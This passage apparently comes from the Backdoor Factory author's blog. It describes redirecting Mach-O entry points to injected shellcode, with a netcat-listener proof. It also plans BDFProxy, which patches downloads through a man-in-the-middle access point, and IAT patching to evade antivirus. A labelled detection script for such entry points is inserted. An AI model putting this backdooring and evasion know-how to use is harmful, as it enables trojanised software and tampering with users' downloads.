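        regs = [0] * 21
        regs[RIP_INDEX] = vmaddr + entry_off
        entry = struct.pack("<IIII", LC_UNIXTHREAD, 16 + 8 * 21, X86_THREAD_STATE64, 42)
        entry += struct.pack("<21Q", *regs)
    else:
        entry = struct.pack("<IIQQ", LC_MAIN, 24, entry_off, 0)
    cmds = seg + sect + entry
    header = struct.pack("<8I", MH_MAGIC_64, 0x01000007, 0x80000003, 2, 2, len(cmds), 0x200085, 0)
    return header + cmds


if __name__ == "__main__":
    print(check_entry(build_macho64(0xF00, 0x100, 0xF20)))   # entry inside __text
    print(check_entry(build_macho64(0xF00, 0x100, 0x200)))   # entry in the zero padding
```

Fat binaries are not handled here: run the check on each architecture slice after splitting at the fat_arch offsets.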
<br />
Here's the beginning of the __TEXT Segment after:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh81JlYhsY70F4SV75RXSUc8IgkEua_or2KMayUwR1f4Y4gCt1Nva0IiGr0PhwwHFQ-uXimTAhGg99WEmle-LKQOFAxTCg2NCg5kJDed1P6yymnc4wa5jqv7r5ctx9KhxRF93lWeJkJ8Ro/s1600/after_patching_text.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh81JlYhsY70F4SV75RXSUc8IgkEua_or2KMayUwR1f4Y4gCt1Nva0IiGr0PhwwHFQ-uXimTAhGg99WEmle-LKQOFAxTCg2NCg5kJDed1P6yymnc4wa5jqv7r5ctx9KhxRF93lWeJkJ8Ro/s1600/after_patching_text.png" height="367" width="400" /></a></div>
<br />
<br />
As you may have already figured out, this method works on both LC_MAIN and LC_UNIXTHREAD binaries. Also, this will work from within Fat binaries.<br />
<br />
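A defender's counterpart to the steps above, added here as an example; it is not BDF's code or the author's. The method above points LC_MAIN/LC_UNIXTHREAD at shellcode placed at the beginning of the __TEXT segment, outside the __text section, so a scanner can parse the load commands and flag any image whose entry point does not fall inside __TEXT,__text. The script builds two constructed 64-bit Mach-O images in memory (one clean, one with its entry moved into the header padding), wraps them in a Fat container, and checks every slice. The struct formats follow Apple's mach-o/loader.h; the image layout, addresses, sizes and Fat alignment are assumptions for the demo, and 32-bit slices are reported as unknown rather than parsed.<br />
<br />
```python
"""Flag Mach-O images whose entry point lies outside __TEXT,__text.
Constructed example, not BDF code: struct formats follow mach-o/loader.h, while
the sample layout (sizes, addresses, Fat alignment) is invented for the demo."""
import struct

MH_MAGIC_64 = 0xFEEDFACF        # 64-bit little-endian thin Mach-O
FAT_MAGIC = 0xCAFEBABE          # Fat container; its header is big-endian
LC_SEGMENT_64, LC_UNIXTHREAD, LC_MAIN = 0x19, 0x05, 0x80000028
HDR_FMT = "<IiiIIIII"           # mach_header_64, 32 bytes
SEG_FMT = "<II16sQQQQiiII"      # segment_command_64, 72 bytes
SECT_FMT = "<16s16sQQIIIIIIII"  # section_64, 80 bytes

def load_commands(data):
    """Yield (cmd, raw command bytes) for a thin 64-bit image."""
    magic, _, _, _, ncmds, _, _, _ = struct.unpack_from(HDR_FMT, data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("only 64-bit little-endian Mach-O slices are handled")
    off = 32
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        yield cmd, data[off:off + cmdsize]
        off += cmdsize

def find_text_section(cmds):
    """Return (addr, size, fileoff) of __TEXT,__text, or None if absent."""
    for cmd, body in cmds:
        if cmd == LC_SEGMENT_64:
            for i in range(struct.unpack_from(SEG_FMT, body)[9]):  # field 9 = nsects
                s = struct.unpack_from(SECT_FMT, body, 72 + 80 * i)
                if (s[0].rstrip(b"\0"), s[1].rstrip(b"\0")) == (b"__text", b"__TEXT"):
                    return s[2], s[3], s[4]
    return None

def check_thin(data):
    """Return (verdict, detail); verdict is 'ok', 'suspicious' or 'unknown'."""
    cmds = list(load_commands(data))
    text = find_text_section(cmds)
    if text is None:
        return "unknown", "no __TEXT,__text section"
    addr, size, fileoff = text
    for cmd, body in cmds:
        if cmd == LC_MAIN:  # entryoff is a file offset: compare with the file range
            entryoff = struct.unpack_from("<Q", body, 8)[0]
            ok = fileoff <= entryoff < fileoff + size
            return ("ok" if ok else "suspicious",
                    f"LC_MAIN entryoff=0x{entryoff:x} vs __text 0x{fileoff:x}-0x{fileoff + size:x}")
        if cmd == LC_UNIXTHREAD:  # x86_64 thread state: rip is register 16, a vm address
            rip = struct.unpack_from("<Q", body, 16 + 8 * 16)[0]
            ok = addr <= rip < addr + size
            return ("ok" if ok else "suspicious",
                    f"LC_UNIXTHREAD rip=0x{rip:x} vs __text 0x{addr:x}-0x{addr + size:x}")
    return "unknown", "no LC_MAIN or LC_UNIXTHREAD"

def check_file(data):
    """Check a thin or Fat file; return [(slice, verdict, detail), ...]."""
    if struct.unpack_from(">I", data, 0)[0] != FAT_MAGIC:
        return [("thin",) + check_thin(data)]
    results = []
    for i in range(struct.unpack_from(">I", data, 4)[0]):
        cputype, _, off, size, _ = struct.unpack_from(">iiIII", data, 8 + 20 * i)
        try:
            verdict = check_thin(data[off:off + size])
        except ValueError as exc:  # e.g. a 32-bit i386 slice
            verdict = ("unknown", str(exc))
        results.append((f"slice{i} cputype=0x{cputype:x}",) + verdict)
    return results

# ---- constructed sample images (layout values invented for the demo) ----
IMAGE_SIZE = 0x1000
TEXT_ADDR, TEXT_OFF, TEXT_SIZE = 0x100000F00, 0xF00, 0x40
PADDING_ENTRY = 32 + 72 + 80 + 24  # first byte after the load commands, before __text

def build_thin(entryoff):
    """Minimal x86_64 MH_EXECUTE: one __TEXT segment holding __text, plus LC_MAIN."""
    seg = struct.pack(SEG_FMT, LC_SEGMENT_64, 72 + 80, b"__TEXT", 0x100000000,
                      IMAGE_SIZE, 0, IMAGE_SIZE, 5, 5, 1, 0)
    sect = struct.pack(SECT_FMT, b"__text", b"__TEXT", TEXT_ADDR, TEXT_SIZE,
                       TEXT_OFF, 4, 0, 0, 0x80000400, 0, 0, 0)
    cmds = seg + sect + struct.pack("<IIQQ", LC_MAIN, 24, entryoff, 0)
    img = struct.pack(HDR_FMT, MH_MAGIC_64, 0x01000007, 3, 2, 2, len(cmds), 0, 0) + cmds
    return img + b"\0" * (IMAGE_SIZE - len(img))

def build_fat(slices):
    """Wrap thin images in a Fat container, each slice starting on a 4 KiB boundary."""
    archs, body, off = b"", b"", 0x1000
    for s in slices:
        cputype, cpusub = struct.unpack_from("<ii", s, 4)
        archs += struct.pack(">iiIII", cputype, cpusub, off, len(s), 12)
        body, off = body + s, off + len(s)
    head = struct.pack(">II", FAT_MAGIC, len(slices)) + archs
    return head + b"\0" * (0x1000 - len(head)) + body

def demo():
    """Fat file with a clean slice and one whose entry was moved into the header padding."""
    return check_file(build_fat([build_thin(TEXT_OFF), build_thin(PADDING_ENTRY)]))

if __name__ == "__main__":
    print(*demo(), sep="\n")
```
<br />
Treat the verdict as a heuristic rather than proof: a legitimate binary whose entry lies in another executable section will trip it too, so confirm a hit against a known-good copy or the code signature before acting on it.<br />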
Proof:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfykE01KO7hQTr7FhYVIhts2LS2IUINdgRNu6wP1fEeG8emZ6mOUXeURAXWwBw_fFHsrSaZA7oQ9V7ssjYQz4Wqt88BgxbWXLVaWTrcwoBn_pU8JnQdYPscFreXQT1judBE5644OoPLc4/s1600/proof.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfykE01KO7hQTr7FhYVIhts2LS2IUINdgRNu6wP1fEeG8emZ6mOUXeURAXWwBw_fFHsrSaZA7oQ9V7ssjYQz4Wqt88BgxbWXLVaWTrcwoBn_pU8JnQdYPscFreXQT1judBE5644OoPLc4/s1600/proof.png" height="640" width="566" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Top window: netcat listener<br />
Bottom window: Executing the patched ls.macho showing all the other successfully patched bins with my POC.</td></tr>
</tbody></table>
<br />
I've already automated the i386/x64 Intel chipset Mach-O patching; expect an update to BDF supporting these chipsets and Fat binaries containing these Mach-O formats.<br />
<br />
Cheers,<br />
Midnite_runr<br />
<br />
<b>Why The BackdoorFactory</b> (2014-04-07)<br />
<br />
Yes. I've questioned myself on the name: Backdoor Factory. Early on in its release, the Google search for my own tool comes up with some interesting results. I don't have the courage to click the "Willy Wonka and the Backdoor Factory" link that ends up in the results: <br />
<img alt="" src="data:image/png;base64,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" /><br />
<br />
Alas, I probably could have picked a better name.<br />
<br />
No matter, time to sleep in the bed I made. <br />
<br />
Backdoor Factory (BdF or BDF) is the result of taking the Cracking the Perimeter (CTP) course from Offensive Security. During the CTP, you learn to patch PE files by hand, among other awesome things. However, I like automation. Although it has taken a lot of time to write BDF, the ability to patch both PE and ELF file formats has taught me a lot about how Windows and Linux OSes work as far as loading each format into memory and linking.<br />
<br />
Now I'm working on BDFProxy, patching binaries over HTTP(S) via a transparent proxy, MITM style. I have a full working demo using a WiFi Pineapple as a wireless AP with a VM running BDFProxy with two NICs. It's fast, multi-threaded, and will support archive files (zip, tar). Release timeline will depend on Con acceptance. :)<br />
<br />
Here, I made a diagram: <br />
<Internet>---<BDFPROXY>----<Evil AP> <br />
<br />
Also, I'm looking into the Mach-O format. Similar to ELF, but not. Like the 90's version of the Red Hot Chili Peppers compared to the 00's version. Once Mach-O is supported, I'll be moving on to ARM chipsets.<br />
<br />
But before ARM, I want to dive into import address table (IAT) patching. Not hooking. Patching. Let's think about this. There has been plenty of writing about hooking the IAT and, let's face it, if it's on CodeProject or Infosec Institute, it's been out there a long time. Patching the IAT would include adding thunks for each API call that you need to complete the functionality of your shellcode. I think by adding the necessary thunks to a BDF target binary, we could take a 380-byte shellcode (reverse tcp) and shorten it to less than 200 bytes by removing Stephen Fewer's API lookup shellcode. Yes, it's not position independent, but if you are patching a binary, you don't need to be position independent; you should know where you are in memory at any given instruction before even running your executable. I have a feeling this will defeat <strike>most</strike> all AVs as you will be making legitimate API calls. As a bonus this should defeat EMET's caller protection (ROP protection, which works only on 32-bit anyway). I hope to have this done by Fall 2014. <br />
<br />
So why BDF?<br />
<br />
To learn binary executable formats, to show everyone that HTTPS should be everywhere and whitelisting should be easy to implement/come standard on OSes, and to show that AVs really don't work.